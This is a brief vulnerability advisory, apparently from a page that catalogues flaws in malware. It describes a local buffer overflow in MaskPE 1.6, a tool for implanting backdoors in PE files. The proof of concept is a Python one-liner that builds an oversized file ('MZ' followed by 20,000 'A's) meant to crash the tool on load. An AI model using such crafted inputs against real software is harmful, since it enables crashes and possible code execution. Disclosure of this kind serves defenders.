Backdoor.Win32.Nucleroot.t MaskPE 1.6 Local Buffer Overflow

MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The backdoor tool does not properly check the files it loads and falls victim to a file based local buffer overflow.

Exploit/PoC:
python -c “print( ‘MZ’+’A’*20000)” > doom.exe

Load it into MaskPE and KABOOM!

Exploit

Local Buffer Overflow

Backdoor.Win32.Latinus.b Remote Buffer Overflow Previous

Xwiki CMS 12.10.2 Cross Site Scripting Next